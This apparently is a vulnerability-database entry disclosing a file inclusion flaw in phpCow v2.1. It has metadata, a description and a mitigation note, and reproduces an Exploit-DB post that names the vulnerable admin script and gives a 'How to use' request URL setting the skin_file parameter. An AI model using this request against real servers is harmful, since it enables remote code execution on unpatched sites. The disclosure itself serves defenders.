phpCow v2.1 File Inclusion Vulnerability

vendor:

phpCow

by:

ViRuS_HiMa

7,5

CVSS

HIGH

File Inclusion

CWE

Product Name: phpCow

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:phpcow:phpcow:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7

2020

phpCow v2.1 File Inclusion Vulnerability

phpCow v2.1 is vulnerable to a file inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can allow the attacker to include a remote file containing arbitrary code, resulting in arbitrary code execution on the server.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, the application should be configured to only allow the inclusion of files from a trusted source.

Source

Exploit-DB raw data:

[*]##############################################  
[+] |____ViRuS_HiMa@YouR SyS__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]====================================================================||
[*] About    : phpCow v2.1 File Inclusion Vulnerability                ||
[!] Site     : http://www.phpcow.com                                   ||
[!] Author   : ViRuS_HiMa                                              ||
[!] Site     : wWw.HeLL-z0ne.org                                       ||                                             
[!] E-Mail   : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM                     ||
[!] TestedOn : Win7                                                    ||
[!]====================================================================||
[!]                  [H]eL[L] [Z]on[E] [C]re[W]                        ||
[!]====================================================================||
[!]                                                                    ||
[!] Vulned :                                                           ||
[!]                                                                    ||
[!]   cowadmin/plugins/templateie/lib/templateie_install.class.php     ||
[!]                                                                    ||
[!]   Notice"cowadmin" = "admin panel path"                            ||
[!]                                                                    ||
[!] in line 14                                                         ||
[!]                                                                    ||
[!] How to use :                                                       ||==========================
[!]                                                                                              ||
[!] http://localhost/cowadmin/plugins/templateie/lib/templateie_install.class.php?skin_file=Hima ||
[!]                                                                                              ||
[!]====================================================================||==========================
[!] Have Fun Sux PPlz :P                                               || 
[!] Greatz : Doksh,RedVirus,Kasper-Ksa,SadHacker,Indushka And Others.  ||                                                                   ||
[*]====================================================================||